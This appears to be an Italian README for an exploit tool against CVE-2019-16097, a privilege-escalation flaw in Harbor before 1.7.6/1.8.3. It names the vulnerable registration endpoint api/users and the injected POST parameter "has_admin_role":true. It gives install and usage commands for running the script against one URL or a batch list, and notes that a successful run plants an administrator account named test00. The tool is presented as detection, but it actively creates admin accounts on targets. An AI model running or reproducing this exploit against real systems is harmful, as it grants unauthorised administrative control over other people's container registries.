
harbor(<1.7.6/1.8.3) elevazione dei privilegi (CVE-2019-16097)
Nel settembre 2019 è stata divulgata una vulnerabilità in harbor che consente di aggiungere un amministratore abusando della funzione di registrazione. Sfruttando l'endpoint di registrazione api/users e costruendo il parametro POST "has_admin_role":true, è possibile aggiungere direttamente un amministratore.
Questo strumento supporta il rilevamento di un singolo URL o in batch.
python2.7
pip install requests
Uso: python harbor-give-me-admin.py -h

Rilevamento di un singolo URL: python harbor-give-me-admin.py -u "https://www.xxx.com/"
// Se l'exploit ha successo, verrà aggiunto l'account amministratore test00, procedi con cautela!

Rilevamento batch: python harbor-give-me-admin.py -f urls,txt
// Se l'exploit ha successo, verrà aggiunto l'account amministratore test00, procedi con cautela!
gmail:[email protected]